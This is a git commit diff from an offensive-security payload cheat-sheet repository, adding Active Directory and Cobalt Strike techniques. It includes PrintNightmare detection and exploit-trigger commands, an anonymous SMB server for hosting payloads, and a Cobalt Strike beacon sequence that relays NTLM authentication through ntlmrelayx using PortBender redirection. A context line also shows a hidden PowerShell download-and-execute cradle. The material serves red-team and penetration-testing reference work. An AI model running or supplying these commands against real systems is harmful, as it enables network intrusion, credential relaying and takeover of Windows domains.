mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-20 03:16:10 +00:00
CS NTLM Relay
This commit is contained in:
parent
6cba7ceda9
commit
fde99044c5
@ -601,19 +601,20 @@ Requirements:
|
|||||||
**Detect the vulnerability**:
|
**Detect the vulnerability**:
|
||||||
* Impacket - [rpcdump](https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/rpcdump.py)
|
* Impacket - [rpcdump](https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/rpcdump.py)
|
||||||
```ps1
|
```ps1
|
||||||
python3 ./rpcdump.py @10.0.2.10 | grep MS-RPRN
|
python3 ./rpcdump.py @10.0.2.10 | egrep 'MS-RPRN|MS-PAR'
|
||||||
Protocol: [MS-RPRN]: Print System Remote Protocol
|
Protocol: [MS-RPRN]: Print System Remote Protocol
|
||||||
```
|
```
|
||||||
* [It Was All A Dream](https://github.com/byt3bl33d3r/ItWasAllADream)
|
* [It Was All A Dream](https://github.com/byt3bl33d3r/ItWasAllADream)
|
||||||
```ps1
|
```ps1
|
||||||
git clone https://github.com/byt3bl33d3r/ItWasAllADream
|
git clone https://github.com/byt3bl33d3r/ItWasAllADream
|
||||||
cd ItWasAllADream && poetry install && poetry shell
|
cd ItWasAllADream && poetry install && poetry shell
|
||||||
itwasalladream -u user -p password -d domain 192.168.1.0/24
|
itwasalladream -u user -p Password123 -d domain 10.10.10.10/24
|
||||||
|
docker run -it itwasalladream -u username -p Password123 -d domain 10.10.10.10
|
||||||
```
|
```
|
||||||
|
|
||||||
**Trigger the exploit**:
|
**Trigger the exploit**:
|
||||||
|
|
||||||
**NOTE**: The payload can be hosted on Impacket SMB server since [PR #1109](https://github.com/SecureAuthCorp/impacket/pull/1109): `python3 ./smbserver.py share /tmp/smb/`
|
**NOTE**: The payload can be hosted on Impacket SMB server since [PR #1109](https://github.com/SecureAuthCorp/impacket/pull/1109): `python3 ./smbserver.py share /tmp/smb/` or using [Invoke-BuildAnonymousSMBServer](https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer/blob/main/Invoke-BuildAnonymousSMBServer.ps1) : `Import-Module .\Invoke-BuildAnonymousSMBServer.ps1; Invoke-BuildAnonymousSMBServer -Path C:\Share -Mode Enable`
|
||||||
|
|
||||||
* [SharpNightmare](https://github.com/cube0x0/CVE-2021-1675)
|
* [SharpNightmare](https://github.com/cube0x0/CVE-2021-1675)
|
||||||
```powershell
|
```powershell
|
||||||
@ -2874,3 +2875,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
|
|||||||
* [Attacking Active Directory: 0 to 0.9 - Eloy Pérez González - 2021/05/29](https://zer1t0.gitlab.io/posts/attacking_ad/)
|
* [Attacking Active Directory: 0 to 0.9 - Eloy Pérez González - 2021/05/29](https://zer1t0.gitlab.io/posts/attacking_ad/)
|
||||||
* [Microsoft ADCS – Abusing PKI in Active Directory Environment - Jean MARSAULT - 14/06/2021](https://www.riskinsight-wavestone.com/en/2021/06/microsoft-adcs-abusing-pki-in-active-directory-environment/)
|
* [Microsoft ADCS – Abusing PKI in Active Directory Environment - Jean MARSAULT - 14/06/2021](https://www.riskinsight-wavestone.com/en/2021/06/microsoft-adcs-abusing-pki-in-active-directory-environment/)
|
||||||
* [Certified Pre-Owned - Will Schroeder and Lee Christensen - June 17, 2021](http://www.harmj0y.net/blog/activedirectory/certified-pre-owned/)
|
* [Certified Pre-Owned - Will Schroeder and Lee Christensen - June 17, 2021](http://www.harmj0y.net/blog/activedirectory/certified-pre-owned/)
|
||||||
|
* [NTLM relaying to AD CS - On certificates, printers and a little hippo - Dirk-jan Mollema](https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/)
|
@ -1037,7 +1037,7 @@ Use the script **azuread_decrypt_msol.ps1** from @xpn to recover the decrypted p
|
|||||||
|
|
||||||
Now you can use the retrieved credentials for the MSOL Account to launch a DCSync attack.
|
Now you can use the retrieved credentials for the MSOL Account to launch a DCSync attack.
|
||||||
|
|
||||||
## Azure AD Connect - Seamless Single Sign On Silver Ticket
|
### Azure AD Connect - Seamless Single Sign On Silver Ticket
|
||||||
|
|
||||||
> Anyone who can edit properties of the AZUREADSSOACCS$ account can impersonate any user in Azure AD using Kerberos (if no MFA)
|
> Anyone who can edit properties of the AZUREADSSOACCS$ account can impersonate any user in Azure AD using Kerberos (if no MFA)
|
||||||
|
|
||||||
|
@ -37,6 +37,7 @@ $ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstri
|
|||||||
* [Resource Kit](#resource-kit)
|
* [Resource Kit](#resource-kit)
|
||||||
* [Artifact Kit](#artifact-kit)
|
* [Artifact Kit](#artifact-kit)
|
||||||
* [Mimikatz Kit](#mimikatz-kit)
|
* [Mimikatz Kit](#mimikatz-kit)
|
||||||
|
* [NTLM Relaying via Cobalt Strike](#ntlm-relaying-via-cobalt-strike)
|
||||||
* [References](#references)
|
* [References](#references)
|
||||||
|
|
||||||
|
|
||||||
@ -169,6 +170,7 @@ $ %windir%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe \\10.10.10.10\Shared\d
|
|||||||
* Cobalt Strike - Malleable C2 Profiles https://github.com/xx0hcd/Malleable-C2-Profiles
|
* Cobalt Strike - Malleable C2 Profiles https://github.com/xx0hcd/Malleable-C2-Profiles
|
||||||
* Cobalt Strike Malleable C2 Design and Reference Guide https://github.com/threatexpress/malleable-c2
|
* Cobalt Strike Malleable C2 Design and Reference Guide https://github.com/threatexpress/malleable-c2
|
||||||
* Malleable-C2-Profiles https://github.com/rsmudge/Malleable-C2-Profiles
|
* Malleable-C2-Profiles https://github.com/rsmudge/Malleable-C2-Profiles
|
||||||
|
* SourcePoint is a C2 profile generator https://github.com/Tylous/SourcePoint
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
set useragent "SOME AGENT"; # GOOD
|
set useragent "SOME AGENT"; # GOOD
|
||||||
@ -472,6 +474,16 @@ Artifact Kit (Cobalt Strike 4.0) - https://www.youtube.com/watch?v=6mC21kviwG4 :
|
|||||||
* Load the mimikatz.cna aggressor script
|
* Load the mimikatz.cna aggressor script
|
||||||
* Use mimikatz functions as normal
|
* Use mimikatz functions as normal
|
||||||
|
|
||||||
|
## NTLM Relaying via Cobalt Strike
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
beacon> socks 1080
|
||||||
|
kali> proxychains python3 /usr/local/bin/ntlmrelayx.py -t smb://<IP_TARGET>
|
||||||
|
beacon> rportfwd_local 8445 <IP_KALI> 445
|
||||||
|
beacon> upload C:\Tools\PortBender\WinDivert64.sys
|
||||||
|
beacon> PortBender redirect 445 8445
|
||||||
|
```
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [Red Team Ops with Cobalt Strike (1 of 9): Operations](https://www.youtube.com/watch?v=q7VQeK533zI)
|
* [Red Team Ops with Cobalt Strike (1 of 9): Operations](https://www.youtube.com/watch?v=q7VQeK533zI)
|
||||||
@ -488,3 +500,4 @@ Artifact Kit (Cobalt Strike 4.0) - https://www.youtube.com/watch?v=6mC21kviwG4 :
|
|||||||
* [TALES OF A RED TEAMER: HOW TO SETUP A C2 INFRASTRUCTURE FOR COBALT STRIKE – UB 2018 - NOV 25 2018](https://holdmybeersecurity.com/2018/11/25/tales-of-a-red-teamer-how-to-setup-a-c2-infrastructure-for-cobalt-strike-ub-2018/)
|
* [TALES OF A RED TEAMER: HOW TO SETUP A C2 INFRASTRUCTURE FOR COBALT STRIKE – UB 2018 - NOV 25 2018](https://holdmybeersecurity.com/2018/11/25/tales-of-a-red-teamer-how-to-setup-a-c2-infrastructure-for-cobalt-strike-ub-2018/)
|
||||||
* [Cobalt Strike - DNS Beacon](https://www.cobaltstrike.com/help-dns-beacon)
|
* [Cobalt Strike - DNS Beacon](https://www.cobaltstrike.com/help-dns-beacon)
|
||||||
* [How to Write Malleable C2 Profiles for Cobalt Strike - January 24, 2017](https://bluescreenofjeff.com/2017-01-24-how-to-write-malleable-c2-profiles-for-cobalt-strike/)
|
* [How to Write Malleable C2 Profiles for Cobalt Strike - January 24, 2017](https://bluescreenofjeff.com/2017-01-24-how-to-write-malleable-c2-profiles-for-cobalt-strike/)
|
||||||
|
* [NTLM Relaying via Cobalt Strike - July 29, 2021 - Rasta Mouse](https://rastamouse.me/ntlm-relaying-via-cobalt-strike/)
|
Loading…
Reference in New Issue
Block a user